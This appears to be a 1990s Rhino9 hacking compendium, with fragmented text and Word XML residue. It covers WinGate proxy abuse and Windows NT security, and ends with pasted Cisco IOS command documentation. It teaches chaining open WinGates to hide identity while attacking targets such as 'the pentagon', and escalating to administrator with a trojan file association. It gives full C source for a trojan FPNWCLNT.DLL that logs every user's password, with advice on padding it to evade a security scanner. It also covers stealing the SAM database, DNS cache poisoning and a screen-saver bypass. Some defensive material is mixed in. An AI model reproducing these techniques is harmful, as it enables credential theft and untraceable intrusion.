Telnet Prox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proxy is setup and run as soon as you are done installing and to make things worse it has no password after install and doesn't ask you for one. Most system admins dont even know this and dont even think to try to password it and that is where the problem ari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telnet proxy is quiet simple. You telnet to port 23 on the server that is running the WinGate telnet proxy and you get a prompt WinGate&gt; At this prompt you type in the server then a space and the port you want to connect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lnet wingate.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nnected to wingate.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Gate&gt; victim.com 2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at this example shows is someone telnetting to the WinGate server and then from that WinGate server telnet out of it to victim.com so on victim.com's logs it will show the wingate IP (wingate.net) and therefore the person telnetting keeps her IP a secr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4] Port 1080  SOCKS Prox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ocks proxy is not installed by default but as soon as you use GateKeeper to install it. It installs with no password, unless you set one. If you are familiar with socks you know that there are many things you could do with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5] Port 6667  IRC Prox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irc proxy is like how we would do a wingate telnet proxy bounce to an irc server except the irc proxy is set to goto a certain server already. This is not set to run after install but after you do install it it setups with no password, unless you set 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6] How Do I Find and Use a WinG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nding WinGates are relatively easy to do. If you would like to find static IP WinGates (IP never changes) go to yahoo or something of the such and search for cable modems. The reason for searching for cable modems is because a lot of people with cable modems have WinGate so that they can split there cable modems large bandwidth and share it with the other computers in there house. One large cable modem company is Cox Cable. Their webpage can be found at www.home.com. The Cox Cable rang of IP's are: 24.1.X.X where depending on what number X equals is where in the country the cable modem is located. You can also use Port or Domain scanners and scan for Port 1080, which Identifies a SOCKS Proxy, this is also an easy way to find a WinG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4.1.67.1 Resolves to c224084-a.frmt1.sfba.home.com which from that we know the abreveation sfba = San Fransico Bay Area or something close to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at is how to find static IP WinGates. To find dynamic IP (IP's that change every time a user logs on to the internet) WinGates it is not to hard at all. Almost every ISP big and small has users with WinGate. You need to either know the format of an ISP's dynamic ppp addresses or you need to get on IRC (Internet Relay Chat) and see what they are that way. Say that you already have a ppp IP of armory-us832.javanet.com. Now you dns that IP and get 209.94.151.143 now you take the IP address and stick it into a domain scanner program. Ex: Domscan which can be found on the Rhino9 web site (rhino9.abyss.com) Ok so you have domscan now. Run domscan and there is a box where you put in the IP address and the port to scan for. The WinGate telnet proxy by default runs on port 23. So we put in 209.94.151.143 in the first box in the domscan program and then 23 in the second box and then click start. The results we will get a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9.94.151.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9.94.151.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9.94.151.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9.94.151.1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9.94.151.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9.94.151.7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9.94.151.11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09.94.151.13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 we have to check each of these IP's for the WinGate prompt. So to do that we need to telnet to 209.94.151.2 on port 23 and if it shows WinGate&gt; right when we connect then it is a WinGate. If not we go to the next address which in this case would be 209.94.151.4. We would do that for the whole list of I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If we are scanning for dynamic IP WinGates it is more common that the last number of the IP of the WinGate will be higher. Ex: There is a better chance that 209.94.151.132 is a WinGate and that 209.94.151.2 is not a WinGa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7] I have found a WinGate telnet proxy now w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ll there are many uses for WinGate. The first use and probably the greatest is the WinGate bounce technique. Say you are going to hack the pentagon. You can use the WinGate technique to keep yourself from having a jail sentence with spike. Here is how it works. We get a collection of WinGate IP's. First we open our telnet program and telnet to the first WinGate on our list. We get the WinGate&gt; prompt and at that prompt we type the second WinGate on our list then a space then 23 then hit enter. Then we get another WinGate prompt and at that prompt we type the third WinGate IP on our list then a space then 23 then enter and so on and so fourth until we have bounced through about 10 or so WinGates  then on the tenth WinGate we enter in the pentagon addresss. Ex: WinGate&gt; www.pentagon-ai.army.gov 23 and then hit enter and start hacking away at it. So you ask, well cant they just trace back through all the WinGates? They could try to trace it back and here is how it would work. The pentagon has an IP on there logs, the ip is 2.2.2.2. The pentagon know that IP belongs to the an internet service provider called interlink. So the pentagon calls interlink and then tells them that at 3:43am on sunday an ip address of 2.2.2.2 hacked into there computer system. So the ISP (internet service provider) checks there logs and sees that there user John Doe was on at that time with that IP on sunday. So the pentagon has the swat team do a raid on John Doe's house and find nothing. Now it could end right here or the pentagon will maybe see that John Doe has WinGate and then check his logs. Now most people with WinGate dont even log so the pentagon could be stumped right there once again or they might see that another IP went through that WinGate and then they will have to repeat the process of calling the ISP and repeat that whole process again. Now if we went through 10 WinGate IP's you know that somewhere in that 10 either the ISP or the WinGate user wont know what IP was going through them, in otherwords if you bounce through 10 WinGate IP's you are a ghost, thy samurai... That is one use of WinGate's telnet proxy. Note: you might need to do a control + enter at the WinGate&gt; prompt, it differs between telnet clients. Another use can be for IRC spoofing. To do this we take a WinGate ip and in our irc client we connect to that WinGate IP. This is an example of how it would look in mIRC for Windows. Do these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server wingate.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then connec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 /quote irc.irc.net 666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then connects to the irc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 /quote user whatever whatever whatever@server.com whate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 /quote nick whate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sends the irc client info. Read the irc rfc for more info on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ce we have done /quote nick whatever mirc will be totally connected and we can then do whatever we want and our IP on IRC will be wingate.net or whatever the wingate IP is. So think about it and I am sure you can think of a few fun things to do with someone elses IP. Note: For you people that choose to abuse this. I have already coded an anti-wingate script for IRC to detect you mean people that choose to abuse th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ose are 2 of the more common things to do with WinGate telnet prox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8] Securing the Proxy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ice That Need To Be Locked To Stop Bounc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3 - Telnet Proxy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80 - SOCKS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667 - IRC Mapp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l Ports Can Be Locked The Same W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w:t>
        <w:tab/>
        <w:t>Load Gatekeep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w:t>
        <w:tab/>
        <w:t>Logon To Wingate Server As Administra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w:t>
        <w:tab/>
        <w:t>Select Service To Lo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w:t>
        <w:tab/>
        <w:t>Right Click And Pick Propert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w:t>
        <w:tab/>
        <w:t>Option One Of Lock Down Is Click "Bind to specific interface" and put 127.0.0.1 in the bo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6-</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Other Way To Lock Down A Service Is Select Policies, Double Click on "Everyone Unrestricted Rights", Click on Location Tab, Click on "Specify locations from where this recipient has rights" next you will be entering the IP(s) you what to give access to this service (Add 127.0.0.1 so the local box has access) you can add by each IP or by groups of IPs like 199.170.0.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ome Other Notes Guest Account Has No Password and Enable on Install Basic Install Let's EVERONE have access to bounce from your system. All ports but the "remote control service" is unlocked and everyone has access, you should turn off any services you do not have a need for by double clicking on the service and unchecking  the "Accept connections on por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0.9] mIRC 5.x WinGate Detection Scrip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is is script will kick/ban anyone running WinG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ias telnet .msg $me $chr(1) $+ DCC CHAT CHAT $longip($$1) $$2 $+ $chr(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ias removenickcheck unset %lastjoined $ni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ias gatekic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et %nick $$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et %chan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oop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nc %chan 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f (%nick ison $chan(%cha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mode $chan(%chan) -o %ni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ban $chan(%chan) %nick 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kick $chan(%chan) %nick -=_Wingate Spoof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goto loop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f ($chan(%chan) == $null) { goto end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goto loop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end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unset %ni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poofcheck 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 1:JOIN:%protchans:set %gatenick $nick | set %lastjoined $nick | timer 1 3 removenickcheck | write $mircdirips.txt %gatenick --&gt; $site &lt;--   [ $time, $date ] | dns $ni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n 1:DNS:echo -a _DNS ON [ $+ $nick $+ ]] | echo -a _IP address: $iaddress | echo -a _Name address: $naddress | set %gateip $iaddress | set %gatename $naddress | telnet %gateip 23 | timer66 1 15 close -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n 1:CHATOPEN:msg =$nick gatecheck | timer66 1 15 close -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n 1:CHAT:*WinGate&gt;*:gatekick %gatenick | write $mircdirgate.txt %gatename = %gatei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 1:CHAT:*many*:gatekick %gatenick | write $mircdirgate.txt %gatename = %gatei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poofcheck e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ateslip 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 1:NI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f ($nick == %lastjoined) &amp;&amp; ($nick != $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echo 4 -a (-=_GateSlip Check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kick %protchans $newnick -=_GateSlip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removenickchec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ateslip e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0.1.0] Conclu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Gate is just another example of a program that is good but it doesnt warn the system admins and as we all know the common system admin doesnt read much just installs thinking it is secure. Software programmers need to either make their programs default to a tight security or at least as the program is install they need it to warn the system admin of possible miss configurations. Wether it is Microsoft products or this simple WinGate remember one thing, the software developer makes the software work they rarely ever warn you on miss configurations. Yes people do put out patches for true exploits etc... but where are the papers on miss configurations? Where are the warnings of things you might do that you should? If I was one of the WinGate programmers I would prompt the user while WinGate is installing and tell them of different security risks they may face. Hope that this paper has helped and that we, Rhino9, have help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0.0] What a security person should know about Win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e basis for this portion of the book was gleaned from simple nomads FAQ, much Props to hi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1.0.1] NT Network structures (Standalone/WorkGroups/Domain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ach NT workstation participates in either a workgroup or a domain. Most companies will have NT workstations participate in a domain for management of the resource by the administra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domain is one or more servers running NT server with all of the servers functioning as a single system. The domain not only contains servers, but NT workstations, Windows for Workgroups machines, and even LAN Manager 2.x machines. The user and group database covers ALL of the resources of a do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ains can be linked together via trusted domains. The advantage of trusted domains is that a user only needs one user account and password to get to resources across multiple domains, and administrators can centrally manage the resour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workgroup is simply a grouping of workstations that do not belong to a domain. A standalone NT workstation is a special case workgrou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 and group accounts are handled differently between domain and workgroup situations. User accounts can be defined on a local or domain level. A local user account can only logon to that local computer, while a domain account can logon from any workstation in the dom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lobal group accounts are defined at a domain level. A global group account is an easy way to grant access to a subset of users in a domain to, say, a single directory or file located on a particular server within the domain. Local group accounts are defined on each computer. A local group account can have global group accounts and user accounts as memb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a domain, the user and group database is "shared" by the servers. NT workstations in the domain DO NOT have a copy of the user and group database, but can access the database. In a workgroup, each computer in the workgroup has its own database, and does not share this inform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0.2] How does the authentication of a user actually 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rst, a user logs on. When this happens, NT creates a token object that represents that user. Each process the user runs is associated with this token (or a copy of it). The token-process combination is refered to as a subject. As subjects access objects such as files and directories, NT checks the subject's token with the Access Control List (ACL) of the object and determines whether to allow the access or not. This may also generate an audit mess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1.0.3] A word on NT Challenge and Respons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hen a user logs on, more than likely they will be using Windows NT Challenge and Response. When using this type of password encryption, the password never actually crosses the wire. A null or random set of characters is generated at the client machine. Those characters are encrypted using the users password. That encrypted information is then sent across the wire. The server then uses what it has stored in its database as the users password to un-encrypt the sent data. If the un-encryption works, it knows that the user typed in the correct password client si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0.4] Default NT user grou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are a number of built-in local groups in NT that can do various functions, some which would be better off being left to the Administrator. Administrators can do everything, but the following groups' members can do a few extra items (I only verified this on 4.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erver Operators: do a shutdown, even remotely; reset the system time; perform backups and restor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Backup Operators: do a shutdown; perform backups and restor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ccount Operators: do a shutdow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Print Operators: do a shutdow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so members of these groups can login at the console. As you explore this book and possibly someone else's server, remember these permissions. Gaining a Server Operator account and placing a trojan that activates after a remote shutdown could get you Administra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0.5] Default directory permiss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only verified these on 4.0. And remember, Administrators are deities. Otherwise, if it isn't here, the group doesn't have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root), \SYSTEM32, \WIN32APP - Server Operators and Everyone can read and execute files, display permissions on files, and do some changing on file attribu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32\CONFIG - Everyone can list filenames in this direc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32\DRIVERS, \SYSTEM\REPL - Server Operators have full access, Everyone has read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32\SPOOL - Server Operators and Print Operator have full access, Everyone has read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32\REPL\EXPORT - Server Operators can read and execute files, display permissions on files, and do some changing on file attributes. Replicator has read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32\REPL\IMPORT - Server Operators and Replicator can read and execute files, display permissions on files, and do some changing on file attributes. Everyone has read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S - Account Operators can read, write, delete, and execute. Everyone can list filenames in this direc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S\DEFAULT - Everyone has read, write, and execu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0.6] Common NT accounts and passwo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are two accounts that come with NT out of the box - administrator and guest. In a network environment, I have run into local administrator access unpassworded, since the Sys Admin thought that global accounts ruled over local ones. Therefore it is possible to gain initial access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 NT box by using its local administrator account with no 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uest is another common unpassworded account, although recent shipments of NT disable the account by default. While it is possible that some companies will delete the guest account, some applications require it. If Microsoft Internet Studio needs to access data on another system,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ll use guest for that remote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0.7] How do I get the admin account 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is possible that a Sys Admin will create a new account, give that account the same access as an administrator, and then remove part of the access to the administrator account. The idea here is that if you don't know the administrator account name, you can't get in as an administra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ing "NBTSTAT -A ipaddress" will give you the new administrator account (generally tagged as a 2 digit 03 code), assuming they are logged in. A bit of social engineering could get them to log in as well. nbtstat will also give you other useful information such as services running, the NT domain name, the nodename, and the ethernet hardware add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0.8] Accessing the password file in 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location of what you need is in \\WINNT\SYSTEM32\CONFIG\SAM which is the location of the security database. This is usually world readable by default, but locked since it is in use by system compotents. It is possible that there are SAM.SAV files which could be readable. If so, these could be obtained for the purpose of getting password inf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uring the installation of NT a copy of the password database is put in \\WINNT\REPAIR. Since it was just installed, only the Administrator and Guest accounts will be there, but maybe Administrator is enough -- especially if the Administrator password is not changed after install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the Sys Admin updates their repair disks, or you get a hold of a copy of the repair disks, you can get password databas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you are insane, you can go poking around in the SAM secret keys. First, schedule service to logon as LocalSystem and allow it to interact with the desktop, and then schedule an interactive regedt32 session. The regedt32 session will be running as LocalSystem and you can play around in the secret keys. However, if you change some stuff this might be very bad. You have to be Administrator to do this, though, so for the hacker you need to walk up to the machine while the Administrator is logged in and distract them by telling them they're giving away Microsoft t-shirts in the lobby (this doesn't always wor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0.9] Cracking the NT passwo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rst off, it should be explained that the passwords are technically not located on the server, or in the password database. What IS located there is a one-way hash of the password. Let me expl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wo one-way hashes are stored on the server -- a Lan Manager password, and a Windows NT password. Lan Manager uses a 14 byte password. If the password is less than 14 bytes, it is concantenated with 0's. It is converted to upper case, and split into 7 byte halves. An 8 byte odd parity DES key is constructed from each 7 byte half. Each 8 byte DES key is encrypted with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gic number" (0x4B47532140232425 encrypted with a key of all 1's). The results of the magic number encryption are concantenated into a 16 byte one way hash value. This value is the Lan Manager "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regular Windows NT password is derived by converting the user's password to Unicode, and using MD4 to get a 16 byte value. This hash value is the NT "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 to crack NT passwords, the username and the corresponding one way hashes (Lan Man and NT) need to be extracted from the password database. Instead of going out and writing some code to do this, simply get a copy of Jeremy Allison's PWDUMP, which goes through SAM and gets the information for yo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WDUMP does require that you are an Administrator to get stuff out of the registry, but if you can get ahold of copies of the security database from another location you can use those. For actually cracking the password, I recommend using L0phtcr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0] What is 'last login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et's say an admin is checking the last time certain users have logged in by doing a NET USER &lt;userid&gt; /DOMAIN. Is the info accurate? Most of the time it will NOT b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st users do not login directly to the Primary Domain Controller (PDC), they login to a Backup Domain Controller (BDC). BDCs do NOT contain readonly versions of SAM, they contain read-write versions. To keep the already ungodly amount of network traffic down, BDCs do not tell the PDC that they have an update of the last login time until a password change has been done. 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NET USER &lt;userid&gt; /DOMAIN command checks the PDC, so last login time returned from this command could be wildly off (it could even show NE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a hacker, if you happen to know that password aging is not enforced, then you can bet that last login times will probably not be very accur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1] Ive got Guest access, can I try for Adm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asic NT 3.51 has some stuff read/writeable by default. You could edit the association between an application and the data file extension using regedt32. First off, you should write a Win32 app that does nothing but the follow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net user administrator biteme /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notepad %1 %2 %3 %4 %5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a share you have read/write access to, upload it. Now change the association between .txt files and notepad to point to the location of the uploaded file, lik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Workstation\RWShare\badboy.ex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 wait for the administrator to launch a text file by double clicking on it, and the password becomes "bite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f course, if the Sys Admin is smart they will have removed write permission from Everyone for HKEY_CLASSES_ROOT, only giving out full access to creator\own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2] I heard that the %systemroot%\system32 was write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ll, this can be exploited on NT 4.0 by placing a trojaned FPNWCLNT.DLL in that directory. This file typically exists in a Netware environment. First compile this exploit code written by Jeremy Allison (jra@cygnus.com) and call the resulting file FPNWCLNT.DLL. Now wait for the user names and passwords to get written to a file in \tem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windows.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stdio.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stdlib.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ruct UNI_STR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USHORT l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USHORT maxl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CHAR *buf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ic HANDLE f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OOLEAN __stdcall InitializeChangeNotif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DWORD wro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fh = CreateFile("C:\\temp\\pwdchange.out", GENERIC_WRI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FILE_SHARE_READ|FILE_SHARE_WRITE, 0, CREATE_ALWAY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FILE_ATTRIBUTE_NORMAL|FILE_FLAG_WRITE_THROUG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riteFile(fh, "InitializeChangeNotify started\n", 31, &amp;wrote,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return TR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NG __stdcall PasswordChangeNotify (struct UNI_STRING *user, ULONG ri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truct UNI_STRING *passw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DWORD wro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CHAR wbuf[2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char buf[51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char buf1[2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DWORD l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memcpy(wbuf, user-&gt;buff, user-&gt;l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en = user-&gt;len/sizeof(WCHA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buf[len] =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cstombs(buf1, wbuf, 1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printf(buf, "User = %s : ", buf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riteFile(fh, buf, strlen(buf), &amp;wrote,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memcpy(wbuf, passwd-&gt;buff, passwd-&gt;l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en = passwd-&gt;len/sizeof(WCHA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buf[len] =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cstombs(buf1, wbuf, 1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printf(buf, "Password = %s : ", buf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riteFile(fh, buf, strlen(buf), &amp;wrote,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printf(buf, "RID = %x\n", ri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riteFile(fh, buf, strlen(buf), &amp;wrote,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return 0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you load this on a Primary Domain Controller, you'll get EVERYBODY'S password. You have to reboot the server after placing the trojan in %systenroot%\system3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SS (www.iss.net) has a security scanner for NT which will detect the trojan DLL, so you may wish to consider adding in extra junk to the above code to make the size of the compiled DLL match what the original was. This will prevent the current shipping version of ISS's NT scanner from picking up the troj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should be noted that by default the group Everyone has default permissions of "Change" in %systemroot\system32, so any DLL that is not in use by the system could be replaced with a trojan DLL that does something el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3] What about spoofin DNS against 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y forging UDP packets, NT name server caches can be compromised. If recursion is allowed on the name server, you can do some nasty things. Recursion is when a server receives a name server lookup request for a zone or domain for which is does not serve. This is typical h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st setups for DNS are d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 how do we do it? We will use the following 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 are root on ns.nmrc.org, IP 10.10.10.1. We have pirate.nmrc.org with an address of 10.10.10.2, and bait.nmrc.org with an address of 10.10.10.3. Our mission? Make the users at lame.com access pirate.nmrc.org when they try to access www.lamer.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kay, assume automation is at work here to make the attack smo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DNS query is sent to ns.lame.com asking for address of bait.nmrc.or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ns.lame.com asks ns.nmrc.org what the address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he request is sniffed, and the query ID number is obtained from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quest pack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DNS query is sent to ns.lame.com asking for the address of www.lamer.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ince we know the previous query ID number, chances are the next que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D number will be close to that numb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e send spoofed DNS replies with several different query ID numbe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se replies are spoofed to appear to come from ns.lamer.net, and st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at its address is 10.10.10.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pirate.nmrc.org is set up to look like www.lamer.net, except maybe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as a notice to "go to the new password page and set up an account and I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dds are this new password is used by that lame.com user somewhere el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th a little creativity, you can also do other exciting things like reroute (and make copies of) email, denial of service (tell lame.com that www.lamer.net doesn't exist anymore), and other fun thing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upposedly Service Pack 3 fixes th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4] What about default shared fold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main thing to realize about shares is that there are a few that are invisible. Administrative shares are default accounts that cannot be removed. They have a $ at the end of their name. For example C$ is the administrative share for the C: partition, D$ is the administrative sh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the D: partition. WINNT$ is the root directory of the system fi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y default since logging is not enabled on failed attempts and the administrator doesn't get locked out from false attempts, you can try and try different passwords for the administrator account. You could also try a dictionary attack Once in, you can get at basically anyth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5] How do I get around a packet filter-based firew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the target NT box is behind a firewall that is doing packet filtering (which is not considered firewalling by many folks) and it does not have SP3 loaded it is possible to send it packets anyway. This involves sending decoy IP packet fragments with specially crafted headers that will be "reused" by the malicious IP packet fragments. This is due to a problem with the way NT's TCP/IP stack handles reassembling fragmented packets. As odd as this sounds, example code exists to prove it works. See the web page at http://www.dataprotect.com/ntfrag for detai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ow does it bypass the packet filter? Typically packet filtering only drops the fragmented packet with the offset of zero in the header. The example source forges the headers to get around this, and NT happily reassembles what does arri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6] What is NTF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TFS is the Windows NT special file system. This file system is tightly integrated into Windows security -- it is what allows access levels to be set from the directory down to individual files within a direc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7] Are there are vulnerabilities to NTFS and access contro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 so much vulnerabilities as there are quirks -- quirks that can be exploited to a certain degr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example, let's say the system admin has built a home directory for you on the server, but has disallowed the construction of directories or files that you wish to make available to the group Everyone. You are wanting to make this special directory so that you can easily retrieve some hack tools but you are cut off. However, if the sys admin left you as the owner of the home directory, you can go in and alter its permissions. This is because as long as you are the owner or Administrator you still control the file. Oh sure, you may get a few complaints from the system when you are doing it, but it can be d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nce NTFS has security integrated into it, there are not too many ways around it. The main one requires access to the physical system. Boot up the system on a DOS diskette, and use NTFSDOS.EXE. It will allow you to access an NTFS volume bypassing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last quirk is that if you have a directory with Full Control instead of RWXDPO permissions, then you get a hidden permission called File Delete Child. FDC cannot be removed. This means that all members of the group Everyone can delete any read-only file in the directory. Depending on what the directory contains, a hacker can replace a file with a troj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8] How is file and directory security enforc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nce files and directories are considered objects (same as services), the security is managed at an "object" leve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 access-control list (ACL) contains information that controls access to an object or controls auditing of attempts to access an object. It begins with a header contains information pertaining to the entire ACL, including the revision level, the size of the ACL, and the number of access-contro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tries (ACEs) in the li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fter the header is a list of ACEs. Each ACE specifies a trustee, a set of access rights, and flags that dictate whether the access rights are allowed, denied, or audited for the trustee. A trustee can be a user account, group account, or a logon account for a service progra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security descriptor can contain two types of ACLs: a discretionary ACL (DACL) and a system ACL (SAC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a DACL, each ACE specifies the types of access that are allowed or denied for a specified trustee. An object's owner controls the information in the object's DACL. For example, the owner of a file can use a DACL to control which users can have access to the file, and which users a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nied acc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the security descriptor for an object does not have a DACL, the object is not protected and the system allows all attempts to access the object. However, if an object has a DACL that contains no ACEs, the DACL does not grant any access rights. In this case, the system denies all attempts to access the objec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a SACL, each ACE specifies the types of access attempts by a specified trustee that cause the system to generate audit records in the system event log. A system administrator controls the information in the object's SACL. An ACE in a SACL can generate audit records when an access attempt fails, when it succeeds, or bo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keep track of the individual object, a Security Identifier (SID) uniquely identify a user or a gro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ID contai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 User and group security descripto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 48-bit ID authorit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 Revision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 Variable subauthority valu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privilege is used to control access to a service or object more strictly than is normal with discretionary access control. Privileges provide access to services rarely needed by most users. For example, one type of privilege might give access for backups and restorals, another might allow the system time to be chang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1.9] Once in, how can I do all that GUI stuf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main problem is adjusting NT file security attributes. Some utilities are available with NT that can be used, but I'd recommend using the NT Command Line Security Utilities. They inclu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aveacl.exe  - saves file, directory and ownership permissions to a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stacl.exe  - restores file permissions and ownership from a saveacl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istacl.exe  - lists file permissions in human readable form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wapacl.exe  - swaps permissions from one user or group to anot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rant.exe    - grants permissions to users/groups on fi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voke.exe   - revokes permissions to users/groups on fi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grant.exe   - grants permisssions to users/groups on directo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revoke.exe  - revokes permissions to users/groups on directo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towner.exe - sets the ownership of files and directo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u.exe       - 'net use' replacement, shows the drives you're connected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latest version can be found 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tp://ftp.netcom.com/pub/wo/woodardk/"&gt;ftp://ftp.netcom.com/pub/wo/woodard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2.0] How do I bypass the screen sa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a user has locked their local workstation using CTRL+ALT+DEL, and you can log in as an administrator, you will have a window of a few seconds where you will see the user's desktop, and even manipulate things. This trick works on NT 3.5 and 3.51, unless the latest service pack has been load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the service pack has been loaded, but it's still 3.X, try the follow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From another NT workstation, type the following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hutdown \\&lt;target_computer&gt; /t:3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This will start a 30 second shutdown on the target and a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indow will pop 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Cancel the shutdown with the following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hutdown \\&lt;target_computer&gt; /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The screen saver will kick back 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Wiggle the mouse on the target. The screen will go blan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Now do a ctrl-alt-del on the targ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An NT Security window will appear. Select cance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You are now at the Program Manag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2.1] How can tell if its an NT bo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opefully it is a web server, and they've simply stated proudly "we're running NT", but don't expect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ort scanning will find some. Typically you'll see port 135 open. This is no guarantee it's not Windows 95, however. Using Samba you should be able to connect and query for the existence of HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT and then check \CurrentVersion\CurrentVersion to determine the version running. If guest is enabled, try this first as Everyone has read permissions here by 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ort 137 is used for running NetBios over IP, and since in the Windows world NetBios is used, certainly you can expect port 137 to be open if IP is anywhere in use around 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other possible indication is checking for port 139. This tells you your target is advertising an SMB resource to share info, but it could be any number of things, such as a Windows 95 machine or even Windows for Workgroups. These may not be entirely out of the question as potenti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rgets, but if you are after NT you will have to use a combination of the aforementioned techniques coupled with some common sen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simplify this entire process, Secure Networks Inc. has a freeware utility called NetBios Auditing Tool. This tool's intent is to test NetBios file sharing configurations and passwords on remote system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1.2.2] What exactly does the NetBios Auditing Tool d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veloped by Secure Networks Inc., it comes in pre-compiled Win32 binary form as well as the complete source code. It is the "SATAN" of NetBios based syste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re is a quote from Secure Networks Inc about the produc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NetBIOS Auditing Tool (NAT) is designed to explore the NETBIOS file-sharing services offered by the target system.  It implements a stepwise approach to gather information and attempt to obtain file system-level access as though it were a legitimate local cli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major steps are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UDP status query is sent to the target, which usually elicits a reply containing the Netbios "computer name".  This is needed to establish a session.  The reply also can contain other information such as the workgroup and account names of the machine's users.  This part of the program needs root privilege to listen for replies on UDP port 137, since the reply is usually sent back to UDP port 137 even if the original query came from some different po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CP connections are made to the target's Netbios port [139], and session requests using the derived computer name are sent across. Various guesses at the computer name are also used, in case the status query failed or returned incomplete information.  If all such attempts to establish a session fail, the host is assumed invulnerable to NETBIOS attacks even if TCP port 139 was reach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vided a connection is established Netbios "protocol levels" are now negotiated across the new connection.  This establishes various modes and capabilities the client and server can use with each other, such as password encryption and if the server uses user-level or share-level Security.  The usable protocol level is deliberately limited to LANMAN version 2 in this case, since that protocol is somewhat simpler and uses a smaller password keyspace than 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the server requires further session setup to establish credentials, various defaults are attempted.  Completely blank usernames and passwords are often allowed to set up "guest" connections to a server; if this fails then guesses are tried using fairly standard account names such as ADMINISTRATOR, and some of the names returned from the status query.  Extensive username/password checking is NOT done at this point, since the aim is just to get the session established, but it should be noted that if this phase is reached at all MANY more guesses can be attempted and likely without the owner of the target being immediately aware of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ce the session is fully set up, transactions are performed to collect more information about the server including any file system "shares" it off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ttempts are then made to connect to all listed file system shares and some potentially unlisted ones.  If the server requires passwords for the shares, defaults are attempted as described above for session setup.  Any successful connections are then explored for writeability and some well-known file-naming problems [the ".." class of bug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a NETBIOS session can be established at all via TCP port 139, the target is declared "vulnerable" with the remaining question being to what extent.  Information is collected under the appropriate vulnerability at most of these steps, since any point along the way be blocked by the Security configurations of the target.  Most Microsoft-OS based servers and Unix SAMBA will yield computer names and share lists, but not allow actual file-sharing connections with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valid username and/or password.  A remote connection to a share is therefore a possibly serious Security problem, and a connection that allows WRITING to the share almost certainly s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inter and other "device" services offered by the server are currently igno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you need more info on NAT, try looking at this web lo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http://www.secnet.com/ntinfo/ntaudit.htm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http://www.rhino9.or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0.0] Cisco Routers and their configur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ny many hackers and security professionals alike take routers for granted. Well, I have a news flash for you, if your routers go down, so does your network. We have included this section to attempt to educate system administrators on configuring cisco routers. Keep in mind that cisco is to date, the most widely used and common router. And for good reason, it's a damn good router. Kudos to Cisco for making an excellent product. (NOTE: The rhino9 team did not sell, or make a profit off of this publication in any way, shape or form.) The information below was retrieved from the Cisco website (www.cisco.com). Copyright 1988-1997 (c) Cisco Systems In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ny times, routers will not have passwords configured (this is mainly due to ignorant administrators... HEY.. Hire someone that knows what theyre doing... like a security professional or a Cisco Engineer.... Geee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0.1] User Interface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hapter describes the commands used to enter and exit the various Cisco Internetwork Operating System (Cisco IOS) configuration command modes. It provides a description of the help command and help features, lists the command editing keys and functions, and details the command history featu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can abbreviate the syntax of Cisco IOS configuration commands. The software recognizes a command when you enter enough characters of the command to uniquely identify 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or user interface task information and examples, see the "Understanding the User Interface" chapter of the Configuration Fundamentals Configuration Gui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0.2] disab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xit privileged EXEC mode and return to user EXEC mode, enter the disable EXEC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evel </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) Specifies the user-privilege level.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e disable command is associated with privilege level 0. If you configure AAA authorization for a privilege level greater than 0, this command will not be included in the command set for that privilege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is command with the level option to reduce the user-privilege level. If a level is not specified, it defaults to the user EXEC mode, which is level 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entering the disable command causes the system to exit privileged EXEC mode and return to user EXEC mode as indicated by the angle bracket (&g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 dis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0.3] edit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enhanced editing mode for a particular line, use the editing line configuration command. To disable the enhanced editing mode, use the no form of this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dit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edit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ne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s </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Func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b </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Completes a partial command name entry. When you enter a unique set of characters and press the Tab key, the system completes the command name. If you enter a set of characters that could indicate more than one command, the system beeps to indicate an error. Enter a question mark (?) immediately following the partial command (no space). The system provides a list of commands that begin with that string.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lete or Backspace </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Erases the character to the left of the curso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eturn </w:t>
        <w:tab/>
        <w:t xml:space="preserve">At the command line, pressing the Return key performs the function of processing a command. At the "---More---" prompt on a terminal screen, pressing the Return key scrolls down a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pace Bar </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Allows you to see more output on the terminal screen. Press the space bar when you see the line "---More---" on the screen to display the next scree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eft Arrow </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Moves the cursor one character to the left. When you enter a command that extends beyond a single line, you can press the Left Arrow key repeatedly to scroll back toward the system prompt and verify the beginning of the command entry.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ight Arrow1 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Moves the cursor one character to the righ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p Arrow1 or Ctrl-P </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Recalls commands in the history buffer, beginning with the most recent command. Repeat the key sequence to recall successively older command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own Arrow1 o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N </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Return to more recent commands in the history buffer after recalling commands with the Up Arrow or Ctrl-P. Repeat the key sequence to recall successively more recent command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A </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Moves the cursor to the beginning of the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B </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Moves the cursor back one characte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D </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Deletes the character at the curso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E </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Moves the cursor to the end of the command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F </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Moves the cursor forward one characte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K </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Deletes all characters from the cursor to the end of the command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L and Ctrl-R </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Redisplays the system prompt and command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T </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Transposes the character to the left of the cursor with the character located at the curso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U and Ctrl-X </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Deletes all characters from the cursor back to the beginning of the command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V and Esc Q </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Inserts a code to indicate to the system that the keystroke immediately following should be treated as a command entry, not as an editing key.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W </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Deletes the word to the left of the curso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Y </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Recalls the most recent entry in the delete buffer. The delete buffer contains the last ten items you have deleted or cut. Ctrl-Y can be used in conjunction with Esc Y.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Z </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Ends configuration mode and returns you to the EXEC promp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sc B </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Moves the cursor back one wor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sc C </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Capitalizes the word from the cursor to the end of the wor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sc D </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Deletes from the cursor to the end of the wor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sc F </w:t>
        <w:tab/>
